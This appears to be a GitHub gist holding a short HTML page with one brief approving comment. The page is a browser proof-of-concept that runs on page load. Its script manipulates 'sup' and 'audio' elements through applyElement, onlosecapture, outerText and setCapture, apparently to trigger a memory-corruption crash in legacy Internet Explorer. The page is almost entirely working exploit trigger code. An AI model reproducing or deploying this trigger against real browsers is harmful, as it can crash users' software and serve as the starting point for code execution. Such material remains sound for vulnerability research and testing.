<html> | |
<script> | |
function trigger() | |
{ | |
var id_0 = document.createElement("sup"); | |
var id_1 = document.createElement("audio"); | |
document.body.appendChild(id_0); | |
document.body.appendChild(id_1); | |
id_1.applyElement(id_0); | |
id_0.onlosecapture=function(e) { | |
document.write(""); | |
} | |
id_0['outerText']=""; | |
id_0.setCapture(); | |
id_1.setCapture(); | |
} | |
window.onload = function() { | |
trigger(); | |
} | |
</script> | |
</html> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
Nice. Glad you found it. Sorry I wasn't able to deliver.